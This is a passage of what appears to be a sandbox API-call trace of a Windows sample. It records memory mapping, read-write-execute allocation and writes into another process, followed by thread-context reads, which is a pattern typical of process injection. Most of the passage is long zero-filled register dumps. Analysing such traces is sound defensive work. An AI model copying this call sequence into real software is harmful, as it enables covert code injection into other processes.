[457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.544] NtMapViewOfSection (in: SectionHandle=0x128, ProcessHandle=0x124, BaseAddress=0x18f618*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18f614*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18f618*=0x400000, SectionOffset=0x0, ViewSize=0x18f614*=0x104000) returned 0x40000003 [0107.555] NtAllocateVirtualMemory (in: ProcessHandle=0x124, BaseAddress=0x18f618*=0x0, ZeroBits=0x0, RegionSize=0x18f614*=0x100000, AllocationType=0x1000, Protect=0x40 | out: BaseAddress=0x18f618*=0x70000, RegionSize=0x18f614*=0x100000) returned 0x0 [0108.231] NtWriteVirtualMemory (in: ProcessHandle=0x124, BaseAddress=0x70000, Buffer=0x2300000*, NumberOfBytesToWrite=0x7000, NumberOfBytesWritten=0x18f614 | out: Buffer=0x2300000*, NumberOfBytesWritten=0x18f614*=0x7000) returned 0x0 [0108.256] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0108.262] NtGetContextThread (in: ThreadHandle=0x120, Context=0x3874100 | out: Context=0x3874100*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x113b7de, Ebp=0x0, Eip=0x773301c4, SegCs=0x23, EFlags=0x202, Esp=0x2dfd88, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0108.268] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, 